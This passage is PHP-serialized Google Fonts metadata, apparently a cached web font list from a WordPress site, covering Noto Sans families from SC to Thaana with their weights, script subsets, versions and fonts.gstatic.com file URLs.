SC\";s:8:\"variants\";a:6:{i:0;s:3:\"100\";i:1;s:3:\"300\";i:2;s:7:\"regular\";i:3;s:3:\"500\";i:4;s:3:\"700\";i:5;s:3:\"900\";}s:7:\"subsets\";a:2:{i:0;s:18:\"chinese-simplified\";i:1;s:5:\"latin\";}s:7:\"version\";s:3:\"v26\";s:12:\"lastModified\";s:10:\"2022-05-10\";s:5:\"files\";O:8:\"stdClass\":6:{s:3:\"100\";s:82:\"http://fonts.gstatic.com/s/notosanssc/v26/k3kJo84MPvpLmixcA63oeALZTYKL2wv287Sb.otf\";s:3:\"300\";s:84:\"http://fonts.gstatic.com/s/notosanssc/v26/k3kIo84MPvpLmixcA63oeALZhaCt9yX6-q2CGg.otf\";s:7:\"regular\";s:80:\"http://fonts.gstatic.com/s/notosanssc/v26/k3kXo84MPvpLmixcA63oeALhL4iJ-Q7m8w.otf\";s:3:\"500\";s:84:\"http://fonts.gstatic.com/s/notosanssc/v26/k3kIo84MPvpLmixcA63oeALZ3aGt9yX6-q2CGg.otf\";s:3:\"700\";s:84:\"http://fonts.gstatic.com/s/notosanssc/v26/k3kIo84MPvpLmixcA63oeALZlaet9yX6-q2CGg.otf\";s:3:\"900\";s:84:\"http://fonts.gstatic.com/s/notosanssc/v26/k3kIo84MPvpLmixcA63oeALZraWt9yX6-q2CGg.otf\";}s:8:\"category\";s:10:\"sans-serif\";s:4:\"kind\";s:16:\"webfonts#webfont\";}i:941;O:8:\"stdClass\":8:{s:6:\"family\";s:19:\"Noto Sans Samaritan\";s:8:\"variants\";a:1:{i:0;s:7:\"regular\";}s:7:\"subsets\";a:1:{i:0;s:9:\"samaritan\";}s:7:\"version\";s:3:\"v15\";s:12:\"lastModified\";s:10:\"2022-05-10\";s:5:\"files\";O:8:\"stdClass\":1:{s:7:\"regular\";s:96:\"http://fonts.gstatic.com/s/notosanssamaritan/v15/buEqppe9f8_vkXadMBJJo0tSmaYjFkxOUo5jNlOVMzQ.ttf\";}s:8:\"category\";s:10:\"sans-serif\";s:4:\"kind\";s:16:\"webfonts#webfont\";}i:942;O:8:\"stdClass\":8:{s:6:\"family\";s:20:\"Noto Sans Saurashtra\";s:8:\"variants\";a:1:{i:0;s:7:\"regular\";}s:7:\"subsets\";a:1:{i:0;s:10:\"saurashtra\";}s:7:\"version\";s:3:\"v15\";s:12:\"lastModified\";s:10:\"2022-05-10\";s:5:\"files\";O:8:\"stdClass\":1:{s:7:\"regular\";s:98:\"http://fonts.gstatic.com/s/notosanssaurashtra/v15/ea8GacQ0Wfz_XKWXe6OtoA8w8zvmYwTef9ndjhPTSIx9.ttf\";}s:8:\"category\";s:10:\"sans-serif\";s:4:\"kind\";s:16:\"webfonts#webfont\";}i:943;O:8:\"stdClass\":8:{s:6:\"family\";s:17:\"Noto Sans Sharada\";s:8:\"variants\";a:1:{i:0;s:7:\"regular\";}s:7:\"subsets\";a:1:{i:0;s:7:\"sharada\";}s:7:\"version\";s:3:\"v15\";s:12:\"lastModified\";s:10:\"2022-05-10\";s:5:\"files\";O:8:\"stdClass\":1:{s:7:\"regular\";s:91:\"http://fonts.gstatic.com/s/notosanssharada/v15/gok0H7rwAEdtF9N8-mdTGALG6p0kwoXLPOwr4H8a.ttf\";}s:8:\"category\";s:10:\"sans-serif\";s:4:\"kind\";s:16:\"webfonts#webfont\";}i:944;O:8:\"stdClass\":8:{s:6:\"family\";s:17:\"Noto Sans Shavian\";s:8:\"variants\";a:1:{i:0;s:7:\"regular\";}s:7:\"subsets\";a:1:{i:0;s:7:\"shavian\";}s:7:\"version\";s:3:\"v15\";s:12:\"lastModified\";s:10:\"2022-05-10\";s:5:\"files\";O:8:\"stdClass\":1:{s:7:\"regular\";s:91:\"http://fonts.gstatic.com/s/notosansshavian/v15/CHy5V_HZE0jxJBQlqAeCKjJvQBNF4EFQSplv2Cwg.ttf\";}s:8:\"category\";s:10:\"sans-serif\";s:4:\"kind\";s:16:\"webfonts#webfont\";}i:945;O:8:\"stdClass\":8:{s:6:\"family\";s:17:\"Noto Sans Siddham\";s:8:\"variants\";a:1:{i:0;s:7:\"regular\";}s:7:\"subsets\";a:1:{i:0;s:7:\"siddham\";}s:7:\"version\";s:3:\"v15\";s:12:\"lastModified\";s:10:\"2022-05-10\";s:5:\"files\";O:8:\"stdClass\":1:{s:7:\"regular\";s:91:\"http://fonts.gstatic.com/s/notosanssiddham/v15/OZpZg-FwqiNLe9PELUikxTWDoCCeGqndk3Ic92ZH.ttf\";}s:8:\"category\";s:10:\"sans-serif\";s:4:\"kind\";s:16:\"webfonts#webfont\";}i:946;O:8:\"stdClass\":8:{s:6:\"family\";s:17:\"Noto Sans Sinhala\";s:8:\"variants\";a:9:{i:0;s:3:\"100\";i:1;s:3:\"200\";i:2;s:3:\"300\";i:3;s:7:\"regular\";i:4;s:3:\"500\";i:5;s:3:\"600\";i:6;s:3:\"700\";i:7;s:3:\"800\";i:8;s:3:\"900\";}s:7:\"subsets\";a:1:{i:0;s:7:\"sinhala\";}s:7:\"version\";s:3:\"v25\";s:12:\"lastModified\";s:10:\"2022-07-19\";s:5:\"files\";O:8:\"stdClass\":9:{s:3:\"100\";s:126:\"http://fonts.gstatic.com/s/notosanssinhala/v25/yMJ2MJBya43H0SUF_WmcBEEf4rQVO2P524V5N_MxQzQtb-tf5dJbC30Fu9zUwg2b5lgLpJwbQRM.ttf\";s:3:\"200\";s:126:\"http://fonts.gstatic.com/s/notosanssinhala/v25/yMJ2MJBya43H0SUF_WmcBEEf4rQVO2P524V5N_MxQzQtb-tf5dJbC30Fu9zUwo2a5lgLpJwbQRM.ttf\";s:3:\"300\";s:126:\"http://fonts.gstatic.com/s/notosanssinhala/v25/yMJ2MJBya43H0SUF_WmcBEEf4rQVO2P524V5N_MxQzQtb-tf5dJbC30Fu9zUwlOa5lgLpJwbQRM.ttf\";s:7:\"regular\";s:126:\"http://fonts.gstatic.com/s/notosanssinhala/v25/yMJ2MJBya43H0SUF_WmcBEEf4rQVO2P524V5N_MxQzQtb-tf5dJbC30Fu9zUwg2a5lgLpJwbQRM.ttf\";s:3:\"500\";s:126:\"http://fonts.gstatic.com/s/notosanssinhala/v25/yMJ2MJBya43H0SUF_WmcBEEf4rQVO2P524V5N_MxQzQtb-tf5dJbC30Fu9zUwj-a5lgLpJwbQRM.ttf\";s:3:\"600\";s:126:\"http://fonts.gstatic.com/s/notosanssinhala/v25/yMJ2MJBya43H0SUF_WmcBEEf4rQVO2P524V5N_MxQzQtb-tf5dJbC30Fu9zUwtOd5lgLpJwbQRM.ttf\";s:3:\"700\";s:126:\"http://fonts.gstatic.com/s/notosanssinhala/v25/yMJ2MJBya43H0SUF_WmcBEEf4rQVO2P524V5N_MxQzQtb-tf5dJbC30Fu9zUwuqd5lgLpJwbQRM.ttf\";s:3:\"800\";s:126:\"http://fonts.gstatic.com/s/notosanssinhala/v25/yMJ2MJBya43H0SUF_WmcBEEf4rQVO2P524V5N_MxQzQtb-tf5dJbC30Fu9zUwo2d5lgLpJwbQRM.ttf\";s:3:\"900\";s:126:\"http://fonts.gstatic.com/s/notosanssinhala/v25/yMJ2MJBya43H0SUF_WmcBEEf4rQVO2P524V5N_MxQzQtb-tf5dJbC30Fu9zUwqSd5lgLpJwbQRM.ttf\";}s:8:\"category\";s:10:\"sans-serif\";s:4:\"kind\";s:16:\"webfonts#webfont\";}i:947;O:8:\"stdClass\":8:{s:6:\"family\";s:17:\"Noto Sans Sogdian\";s:8:\"variants\";a:1:{i:0;s:7:\"regular\";}s:7:\"subsets\";a:1:{i:0;s:7:\"sogdian\";}s:7:\"version\";s:3:\"v15\";s:12:\"lastModified\";s:10:\"2022-05-10\";s:5:\"files\";O:8:\"stdClass\":1:{s:7:\"regular\";s:91:\"http://fonts.gstatic.com/s/notosanssogdian/v15/taiQGn5iC4--qtsfi4Jp6eHPnfxQBo--Pm6KHidM.ttf\";}s:8:\"category\";s:10:\"sans-serif\";s:4:\"kind\";s:16:\"webfonts#webfont\";}i:948;O:8:\"stdClass\":8:{s:6:\"family\";s:22:\"Noto Sans Sora Sompeng\";s:8:\"variants\";a:4:{i:0;s:7:\"regular\";i:1;s:3:\"500\";i:2;s:3:\"600\";i:3;s:3:\"700\";}s:7:\"subsets\";a:1:{i:0;s:12:\"sora-sompeng\";}s:7:\"version\";s:3:\"v17\";s:12:\"lastModified\";s:10:\"2022-07-19\";s:5:\"files\";O:8:\"stdClass\":4:{s:7:\"regular\";s:119:\"http://fonts.gstatic.com/s/notosanssorasompeng/v17/PlIRFkO5O6RzLfvNNVSioxM2_OTrEhPyDLolKvCsHzCxWuGkYHR818DpZXJQd4Mu.ttf\";s:3:\"500\";s:119:\"http://fonts.gstatic.com/s/notosanssorasompeng/v17/PlIRFkO5O6RzLfvNNVSioxM2_OTrEhPyDLolKvCsHzCxWuGkYHRO18DpZXJQd4Mu.ttf\";s:3:\"600\";s:119:\"http://fonts.gstatic.com/s/notosanssorasompeng/v17/PlIRFkO5O6RzLfvNNVSioxM2_OTrEhPyDLolKvCsHzCxWuGkYHSi0MDpZXJQd4Mu.ttf\";s:3:\"700\";s:119:\"http://fonts.gstatic.com/s/notosanssorasompeng/v17/PlIRFkO5O6RzLfvNNVSioxM2_OTrEhPyDLolKvCsHzCxWuGkYHSb0MDpZXJQd4Mu.ttf\";}s:8:\"category\";s:10:\"sans-serif\";s:4:\"kind\";s:16:\"webfonts#webfont\";}i:949;O:8:\"stdClass\":8:{s:6:\"family\";s:17:\"Noto Sans Soyombo\";s:8:\"variants\";a:1:{i:0;s:7:\"regular\";}s:7:\"subsets\";a:1:{i:0;s:7:\"soyombo\";}s:7:\"version\";s:3:\"v15\";s:12:\"lastModified\";s:10:\"2022-05-10\";s:5:\"files\";O:8:\"stdClass\":1:{s:7:\"regular\";s:91:\"http://fonts.gstatic.com/s/notosanssoyombo/v15/RWmSoL-Y6-8q5LTtXs6MF6q7xsxgY0FrIFOcK25W.ttf\";}s:8:\"category\";s:10:\"sans-serif\";s:4:\"kind\";s:16:\"webfonts#webfont\";}i:950;O:8:\"stdClass\":8:{s:6:\"family\";s:19:\"Noto Sans Sundanese\";s:8:\"variants\";a:4:{i:0;s:7:\"regular\";i:1;s:3:\"500\";i:2;s:3:\"600\";i:3;s:3:\"700\";}s:7:\"subsets\";a:1:{i:0;s:9:\"sundanese\";}s:7:\"version\";s:3:\"v17\";s:12:\"lastModified\";s:10:\"2022-07-19\";s:5:\"files\";O:8:\"stdClass\":4:{s:7:\"regular\";s:113:\"http://fonts.gstatic.com/s/notosanssundanese/v17/FwZw7_84xUkosG2xJo2gm7nFwSLQkdymq2mkz3Gz1_b6ctxpNNHCizv7fQES.ttf\";s:3:\"500\";s:113:\"http://fonts.gstatic.com/s/notosanssundanese/v17/FwZw7_84xUkosG2xJo2gm7nFwSLQkdymq2mkz3Gz1_b6ctxbNNHCizv7fQES.ttf\";s:3:\"600\";s:113:\"http://fonts.gstatic.com/s/notosanssundanese/v17/FwZw7_84xUkosG2xJo2gm7nFwSLQkdymq2mkz3Gz1_b6cty3M9HCizv7fQES.ttf\";s:3:\"700\";s:113:\"http://fonts.gstatic.com/s/notosanssundanese/v17/FwZw7_84xUkosG2xJo2gm7nFwSLQkdymq2mkz3Gz1_b6ctyOM9HCizv7fQES.ttf\";}s:8:\"category\";s:10:\"sans-serif\";s:4:\"kind\";s:16:\"webfonts#webfont\";}i:951;O:8:\"stdClass\":8:{s:6:\"family\";s:22:\"Noto Sans Syloti Nagri\";s:8:\"variants\";a:1:{i:0;s:7:\"regular\";}s:7:\"subsets\";a:1:{i:0;s:12:\"syloti-nagri\";}s:7:\"version\";s:3:\"v15\";s:12:\"lastModified\";s:10:\"2022-05-10\";s:5:\"files\";O:8:\"stdClass\":1:{s:7:\"regular\";s:102:\"http://fonts.gstatic.com/s/notosanssylotinagri/v15/uU9eCAQZ75uhfF9UoWDRiY3q7Sf_VFV3m4dGFVfxN87gsj0.ttf\";}s:8:\"category\";s:10:\"sans-serif\";s:4:\"kind\";s:16:\"webfonts#webfont\";}i:952;O:8:\"stdClass\":8:{s:6:\"family\";s:17:\"Noto Sans Symbols\";s:8:\"variants\";a:9:{i:0;s:3:\"100\";i:1;s:3:\"200\";i:2;s:3:\"300\";i:3;s:7:\"regular\";i:4;s:3:\"500\";i:5;s:3:\"600\";i:6;s:3:\"700\";i:7;s:3:\"800\";i:8;s:3:\"900\";}s:7:\"subsets\";a:1:{i:0;s:7:\"symbols\";}s:7:\"version\";s:3:\"v34\";s:12:\"lastModified\";s:10:\"2022-06-01\";s:5:\"files\";O:8:\"stdClass\":9:{s:3:\"100\";s:109:\"http://fonts.gstatic.com/s/notosanssymbols/v34/rP2up3q65FkAtHfwd-eIS2brbDN6gxP34F9jRRCe4W3gfQ4gavVFRkzrbQ.ttf\";s:3:\"200\";s:109:\"http://fonts.gstatic.com/s/notosanssymbols/v34/rP2up3q65FkAtHfwd-eIS2brbDN6gxP34F9jRRCe4W3g_Q8gavVFRkzrbQ.ttf\";s:3:\"300\";s:109:\"http://fonts.gstatic.com/s/notosanssymbols/v34/rP2up3q65FkAtHfwd-eIS2brbDN6gxP34F9jRRCe4W3gIw8gavVFRkzrbQ.ttf\";s:7:\"regular\";s:109:\"http://fonts.gstatic.com/s/notosanssymbols/v34/rP2up3q65FkAtHfwd-eIS2brbDN6gxP34F9jRRCe4W3gfQ8gavVFRkzrbQ.ttf\";s:3:\"500\";s:109:\"http://fonts.gstatic.com/s/notosanssymbols/v34/rP2up3q65FkAtHfwd-eIS2brbDN6gxP34F9jRRCe4W3gTw8gavVFRkzrbQ.ttf\";s:3:\"600\";s:109:\"http://fonts.gstatic.com/s/notosanssymbols/v34/rP2up3q65FkAtHfwd-eIS2brbDN6gxP34F9jRRCe4W3gowggavVFRkzrbQ.ttf\";s:3:\"700\";s:109:\"http://fonts.gstatic.com/s/notosanssymbols/v34/rP2up3q65FkAtHfwd-eIS2brbDN6gxP34F9jRRCe4W3gmgggavVFRkzrbQ.ttf\";s:3:\"800\";s:109:\"http://fonts.gstatic.com/s/notosanssymbols/v34/rP2up3q65FkAtHfwd-eIS2brbDN6gxP34F9jRRCe4W3g_QggavVFRkzrbQ.ttf\";s:3:\"900\";s:109:\"http://fonts.gstatic.com/s/notosanssymbols/v34/rP2up3q65FkAtHfwd-eIS2brbDN6gxP34F9jRRCe4W3g1AggavVFRkzrbQ.ttf\";}s:8:\"category\";s:10:\"sans-serif\";s:4:\"kind\";s:16:\"webfonts#webfont\";}i:953;O:8:\"stdClass\":8:{s:6:\"family\";s:19:\"Noto Sans Symbols 2\";s:8:\"variants\";a:1:{i:0;s:7:\"regular\";}s:7:\"subsets\";a:1:{i:0;s:7:\"symbols\";}s:7:\"version\";s:3:\"v15\";s:12:\"lastModified\";s:10:\"2022-05-10\";s:5:\"files\";O:8:\"stdClass\":1:{s:7:\"regular\";s:95:\"http://fonts.gstatic.com/s/notosanssymbols2/v15/I_uyMoGduATTei9eI8daxVHDyfisHr71ypPqfX71-AI.ttf\";}s:8:\"category\";s:10:\"sans-serif\";s:4:\"kind\";s:16:\"webfonts#webfont\";}i:954;O:8:\"stdClass\":8:{s:6:\"family\";s:16:\"Noto Sans Syriac\";s:8:\"variants\";a:3:{i:0;s:3:\"100\";i:1;s:7:\"regular\";i:2;s:3:\"900\";}s:7:\"subsets\";a:1:{i:0;s:6:\"syriac\";}s:7:\"version\";s:3:\"v15\";s:12:\"lastModified\";s:10:\"2022-05-10\";s:5:\"files\";O:8:\"stdClass\":3:{s:3:\"100\";s:92:\"http://fonts.gstatic.com/s/notosanssyriac/v15/KtkwAKuMeZjqPnXgyqribqzQqgW0D-e9XaRE7sX5Cg.ttf\";s:7:\"regular\";s:89:\"http://fonts.gstatic.com/s/notosanssyriac/v15/Ktk2AKuMeZjqPnXgyqribqzQqgW0N4O3WYZB_sU.ttf\";s:3:\"900\";s:93:\"http://fonts.gstatic.com/s/notosanssyriac/v15/KtkxAKuMeZjqPnXgyqribqzQqgW0DweafY5q4szgE-Q.ttf\";}s:8:\"category\";s:10:\"sans-serif\";s:4:\"kind\";s:16:\"webfonts#webfont\";}i:955;O:8:\"stdClass\":8:{s:6:\"family\";s:12:\"Noto Sans TC\";s:8:\"variants\";a:6:{i:0;s:3:\"100\";i:1;s:3:\"300\";i:2;s:7:\"regular\";i:3;s:3:\"500\";i:4;s:3:\"700\";i:5;s:3:\"900\";}s:7:\"subsets\";a:2:{i:0;s:19:\"chinese-traditional\";i:1;s:5:\"latin\";}s:7:\"version\";s:3:\"v26\";s:12:\"lastModified\";s:10:\"2022-05-10\";s:5:\"files\";O:8:\"stdClass\":6:{s:3:\"100\";s:82:\"http://fonts.gstatic.com/s/notosanstc/v26/-nFlOG829Oofr2wohFbTp9i9WyEJIfNZ1sjy.otf\";s:3:\"300\";s:84:\"http://fonts.gstatic.com/s/notosanstc/v26/-nFkOG829Oofr2wohFbTp9i9kwMvDd1V39Hr7g.otf\";s:7:\"regular\";s:80:\"http://fonts.gstatic.com/s/notosanstc/v26/-nF7OG829Oofr2wohFbTp9iFOSsLA_ZJ1g.otf\";s:3:\"500\";s:84:\"http://fonts.gstatic.com/s/notosanstc/v26/-nFkOG829Oofr2wohFbTp9i9ywIvDd1V39Hr7g.otf\";s:3:\"700\";s:84:\"http://fonts.gstatic.com/s/notosanstc/v26/-nFkOG829Oofr2wohFbTp9i9gwQvDd1V39Hr7g.otf\";s:3:\"900\";s:84:\"http://fonts.gstatic.com/s/notosanstc/v26/-nFkOG829Oofr2wohFbTp9i9uwYvDd1V39Hr7g.otf\";}s:8:\"category\";s:10:\"sans-serif\";s:4:\"kind\";s:16:\"webfonts#webfont\";}i:956;O:8:\"stdClass\":8:{s:6:\"family\";s:17:\"Noto Sans Tagalog\";s:8:\"variants\";a:1:{i:0;s:7:\"regular\";}s:7:\"subsets\";a:1:{i:0;s:7:\"tagalog\";}s:7:\"version\";s:3:\"v15\";s:12:\"lastModified\";s:10:\"2022-05-10\";s:5:\"files\";O:8:\"stdClass\":1:{s:7:\"regular\";s:91:\"http://fonts.gstatic.com/s/notosanstagalog/v15/J7aFnoNzCnFcV9ZI-sUYuvote1R0wwEAA8jHexnL.ttf\";}s:8:\"category\";s:10:\"sans-serif\";s:4:\"kind\";s:16:\"webfonts#webfont\";}i:957;O:8:\"stdClass\":8:{s:6:\"family\";s:18:\"Noto Sans Tagbanwa\";s:8:\"variants\";a:1:{i:0;s:7:\"regular\";}s:7:\"subsets\";a:1:{i:0;s:8:\"tagbanwa\";}s:7:\"version\";s:3:\"v15\";s:12:\"lastModified\";s:10:\"2022-05-10\";s:5:\"files\";O:8:\"stdClass\":1:{s:7:\"regular\";s:94:\"http://fonts.gstatic.com/s/notosanstagbanwa/v15/Y4GWYbB8VTEp4t3MKJSMmQdIKjRtt_nZRjQEaYpGoQ.ttf\";}s:8:\"category\";s:10:\"sans-serif\";s:4:\"kind\";s:16:\"webfonts#webfont\";}i:958;O:8:\"stdClass\":8:{s:6:\"family\";s:16:\"Noto Sans Tai Le\";s:8:\"variants\";a:1:{i:0;s:7:\"regular\";}s:7:\"subsets\";a:1:{i:0;s:6:\"tai-le\";}s:7:\"version\";s:3:\"v15\";s:12:\"lastModified\";s:10:\"2022-05-10\";s:5:\"files\";O:8:\"stdClass\":1:{s:7:\"regular\";s:88:\"http://fonts.gstatic.com/s/notosanstaile/v15/vEFK2-VODB8RrNDvZSUmVxEATwR58tK1W77HtMo.ttf\";}s:8:\"category\";s:10:\"sans-serif\";s:4:\"kind\";s:16:\"webfonts#webfont\";}i:959;O:8:\"stdClass\":8:{s:6:\"family\";s:18:\"Noto Sans Tai Tham\";s:8:\"variants\";a:4:{i:0;s:7:\"regular\";i:1;s:3:\"500\";i:2;s:3:\"600\";i:3;s:3:\"700\";}s:7:\"subsets\";a:1:{i:0;s:8:\"tai-tham\";}s:7:\"version\";s:3:\"v17\";s:12:\"lastModified\";s:10:\"2022-07-19\";s:5:\"files\";O:8:\"stdClass\":4:{s:7:\"regular\";s:110:\"http://fonts.gstatic.com/s/notosanstaitham/v17/kJEbBv0U4hgtwxDUw2x9q7tbjLIfbPGHBoaVSAZ3MdLJBCUbPgquyaRGKMw.ttf\";s:3:\"500\";s:110:\"http://fonts.gstatic.com/s/notosanstaitham/v17/kJEbBv0U4hgtwxDUw2x9q7tbjLIfbPGHBoaVSAZ3MdLJBBcbPgquyaRGKMw.ttf\";s:3:\"600\";s:110:\"http://fonts.gstatic.com/s/notosanstaitham/v17/kJEbBv0U4hgtwxDUw2x9q7tbjLIfbPGHBoaVSAZ3MdLJBPscPgquyaRGKMw.ttf\";s:3:\"700\";s:110:\"http://fonts.gstatic.com/s/notosanstaitham/v17/kJEbBv0U4hgtwxDUw2x9q7tbjLIfbPGHBoaVSAZ3MdLJBMIcPgquyaRGKMw.ttf\";}s:8:\"category\";s:10:\"sans-serif\";s:4:\"kind\";s:16:\"webfonts#webfont\";}i:960;O:8:\"stdClass\":8:{s:6:\"family\";s:18:\"Noto Sans Tai Viet\";s:8:\"variants\";a:1:{i:0;s:7:\"regular\";}s:7:\"subsets\";a:1:{i:0;s:8:\"tai-viet\";}s:7:\"version\";s:3:\"v15\";s:12:\"lastModified\";s:10:\"2022-05-10\";s:5:\"files\";O:8:\"stdClass\":1:{s:7:\"regular\";s:93:\"http://fonts.gstatic.com/s/notosanstaiviet/v15/8QIUdj3HhN_lv4jf9vsE-9GMOLsaSPZr644fWsRO9w.ttf\";}s:8:\"category\";s:10:\"sans-serif\";s:4:\"kind\";s:16:\"webfonts#webfont\";}i:961;O:8:\"stdClass\":8:{s:6:\"family\";s:15:\"Noto Sans Takri\";s:8:\"variants\";a:1:{i:0;s:7:\"regular\";}s:7:\"subsets\";a:1:{i:0;s:5:\"takri\";}s:7:\"version\";s:3:\"v15\";s:12:\"lastModified\";s:10:\"2022-05-10\";s:5:\"files\";O:8:\"stdClass\":1:{s:7:\"regular\";s:87:\"http://fonts.gstatic.com/s/notosanstakri/v15/TuGJUVpzXI5FBtUq5a8bnKIOdTwQNO_W3khJXg.ttf\";}s:8:\"category\";s:10:\"sans-serif\";s:4:\"kind\";s:16:\"webfonts#webfont\";}i:962;O:8:\"stdClass\":8:{s:6:\"family\";s:15:\"Noto Sans Tamil\";s:8:\"variants\";a:9:{i:0;s:3:\"100\";i:1;s:3:\"200\";i:2;s:3:\"300\";i:3;s:7:\"regular\";i:4;s:3:\"500\";i:5;s:3:\"600\";i:6;s:3:\"700\";i:7;s:3:\"800\";i:8;s:3:\"900\";}s:7:\"subsets\";a:3:{i:0;s:5:\"latin\";i:1;s:9:\"latin-ext\";i:2;s:5:\"tamil\";}s:7:\"version\";s:3:\"v21\";s:12:\"lastModified\";s:10:\"2022-08-09\";s:5:\"files\";O:8:\"stdClass\":9:{s:3:\"100\";s:121:\"http://fonts.gstatic.com/s/notosanstamil/v21/ieVc2YdFI3GCY6SyQy1KfStzYKZgzN1z4LKDbeZce-0429tBManUktuex7vGor0RqKDt_EvT.ttf\";s:3:\"200\";s:121:\"http://fonts.gstatic.com/s/notosanstamil/v21/ieVc2YdFI3GCY6SyQy1KfStzYKZgzN1z4LKDbeZce-0429tBManUktuex7tGo70RqKDt_EvT.ttf\";s:3:\"300\";s:121:\"http://fonts.gstatic.com/s/notosanstamil/v21/ieVc2YdFI3GCY6SyQy1KfStzYKZgzN1z4LKDbeZce-0429tBManUktuex7uYo70RqKDt_EvT.ttf\";s:7:\"regular\";s:121:\"http://fonts.gstatic.com/s/notosanstamil/v21/ieVc2YdFI3GCY6SyQy1KfStzYKZgzN1z4LKDbeZce-0429tBManUktuex7vGo70RqKDt_EvT.ttf\";s:3:\"500\";s:121:\"http://fonts.gstatic.com/s/notosanstamil/v21/ieVc2YdFI3GCY6SyQy1KfStzYKZgzN1z4LKDbeZce-0429tBManUktuex7v0o70RqKDt_EvT.ttf\";s:3:\"600\";s:121:\"http://fonts.gstatic.com/s/notosanstamil/v21/ieVc2YdFI3GCY6SyQy1KfStzYKZgzN1z4LKDbeZce-0429tBManUktuex7sYpL0RqKDt_EvT.ttf\";s:3:\"700\";s:121:\"http://fonts.gstatic.com/s/notosanstamil/v21/ieVc2YdFI3GCY6SyQy1KfStzYKZgzN1z4LKDbeZce-0429tBManUktuex7shpL0RqKDt_EvT.ttf\";s:3:\"800\";s:121:\"http://fonts.gstatic.com/s/notosanstamil/v21/ieVc2YdFI3GCY6SyQy1KfStzYKZgzN1z4LKDbeZce-0429tBManUktuex7tGpL0RqKDt_EvT.ttf\";s:3:\"900\";s:121:\"http://fonts.gstatic.com/s/notosanstamil/v21/ieVc2YdFI3GCY6SyQy1KfStzYKZgzN1z4LKDbeZce-0429tBManUktuex7tvpL0RqKDt_EvT.ttf\";}s:8:\"category\";s:10:\"sans-serif\";s:4:\"kind\";s:16:\"webfonts#webfont\";}i:963;O:8:\"stdClass\":8:{s:6:\"family\";s:26:\"Noto Sans Tamil Supplement\";s:8:\"variants\";a:1:{i:0;s:7:\"regular\";}s:7:\"subsets\";a:1:{i:0;s:16:\"tamil-supplement\";}s:7:\"version\";s:3:\"v19\";s:12:\"lastModified\";s:10:\"2022-05-10\";s:5:\"files\";O:8:\"stdClass\":1:{s:7:\"regular\";s:111:\"http://fonts.gstatic.com/s/notosanstamilsupplement/v19/DdTz78kEtnooLS5rXF1DaruiCd_bFp_Ph4sGcn7ax_vsAeMkeq1x.ttf\";}s:8:\"category\";s:10:\"sans-serif\";s:4:\"kind\";s:16:\"webfonts#webfont\";}i:964;O:8:\"stdClass\":8:{s:6:\"family\";s:16:\"Noto Sans Telugu\";s:8:\"variants\";a:9:{i:0;s:3:\"100\";i:1;s:3:\"200\";i:2;s:3:\"300\";i:3;s:7:\"regular\";i:4;s:3:\"500\";i:5;s:3:\"600\";i:6;s:3:\"700\";i:7;s:3:\"800\";i:8;s:3:\"900\";}s:7:\"subsets\";a:3:{i:0;s:5:\"latin\";i:1;s:9:\"latin-ext\";i:2;s:6:\"telugu\";}s:7:\"version\";s:3:\"v19\";s:12:\"lastModified\";s:10:\"2022-08-16\";s:5:\"files\";O:8:\"stdClass\":9:{s:3:\"100\";s:124:\"http://fonts.gstatic.com/s/notosanstelugu/v19/0FlxVOGZlE2Rrtr-HmgkMWJNjJ5_RyT8o8c7fHkeg-esVC5dzHkHIJQqrEntezfqQUbf-3v37w.ttf\";s:3:\"200\";s:124:\"http://fonts.gstatic.com/s/notosanstelugu/v19/0FlxVOGZlE2Rrtr-HmgkMWJNjJ5_RyT8o8c7fHkeg-esVC5dzHkHIJQqrEnt-zbqQUbf-3v37w.ttf\";s:3:\"300\";s:124:\"http://fonts.gstatic.com/s/notosanstelugu/v19/0FlxVOGZlE2Rrtr-HmgkMWJNjJ5_RyT8o8c7fHkeg-esVC5dzHkHIJQqrEntJTbqQUbf-3v37w.ttf\";s:7:\"regular\";s:124:\"http://fonts.gstatic.com/s/notosanstelugu/v19/0FlxVOGZlE2Rrtr-HmgkMWJNjJ5_RyT8o8c7fHkeg-esVC5dzHkHIJQqrEntezbqQUbf-3v37w.ttf\";s:3:\"500\";s:124:\"http://fonts.gstatic.com/s/notosanstelugu/v19/0FlxVOGZlE2Rrtr-HmgkMWJNjJ5_RyT8o8c7fHkeg-esVC5dzHkHIJQqrEntSTbqQUbf-3v37w.ttf\";s:3:\"600\";s:124:\"http://fonts.gstatic.com/s/notosanstelugu/v19/0FlxVOGZlE2Rrtr-HmgkMWJNjJ5_RyT8o8c7fHkeg-esVC5dzHkHIJQqrEntpTHqQUbf-3v37w.ttf\";s:3:\"700\";s:124:\"http://fonts.gstatic.com/s/notosanstelugu/v19/0FlxVOGZlE2Rrtr-HmgkMWJNjJ5_RyT8o8c7fHkeg-esVC5dzHkHIJQqrEntnDHqQUbf-3v37w.ttf\";s:3:\"800\";s:124:\"http://fonts.gstatic.com/s/notosanstelugu/v19/0FlxVOGZlE2Rrtr-HmgkMWJNjJ5_RyT8o8c7fHkeg-esVC5dzHkHIJQqrEnt-zHqQUbf-3v37w.ttf\";s:3:\"900\";s:124:\"http://fonts.gstatic.com/s/notosanstelugu/v19/0FlxVOGZlE2Rrtr-HmgkMWJNjJ5_RyT8o8c7fHkeg-esVC5dzHkHIJQqrEnt0jHqQUbf-3v37w.ttf\";}s:8:\"category\";s:10:\"sans-serif\";s:4:\"kind\";s:16:\"webfonts#webfont\";}i:965;O:8:\"stdClass\":8:{s:6:\"family\";s:16:\"Noto Sans Thaana\";s:8:\"variants\";a:9:{i:0;s:3:\"100\";i:1;s:3:\"200\";i:2;s:3:\"300\";i:3;s:7:\"regular\";i:4;s:3:\"500\";i:5;s:3:\"600\";i:6;s:3:\"700\";i:7;s:3:\"800\";i:8;s:3:\"900\";}s:7:\"subsets\";a:1:{i:0;s:6:\"thaana\";}s:7:\"version\";s:3:\"v16\";s:12:\"lastModified\";s:10:\"2022-07-19\";s:5:\"files\";O:8:\"stdClass\":9:{s:3:\"100\";s:106:\"http://fonts.gstatic.com/s/notosansthaana/v16/C8c14dM-vnz-s-3jaEsxlxHkBH-WZOETXfoQrfQ9Y4XrbxLhnu4-tbNu.ttf\";s:3:\"200\";s:106:\"http://fonts.gstatic.com/s/notosansthaana/v16/C8c14dM-vnz-s-3jaEsxlxHkBH-WZOETXfoQrfQ9Y4VrbhLhnu4-tbNu.ttf\";s:3:\"300\";s:106:\"http://fonts.gstatic.com/s/notosansthaana/v16/C8c14dM-vnz-s-3jaEsxlxHkBH-WZOETXfoQrfQ9Y4W1bhLhnu4-tbNu.ttf\";s:7:\"regular\";s:106:\"http://fonts.gstatic.com/s/notosansthaana/v16/C8c14dM-vnz-s-3jaEsxlxHkBH-WZOETXfoQrfQ9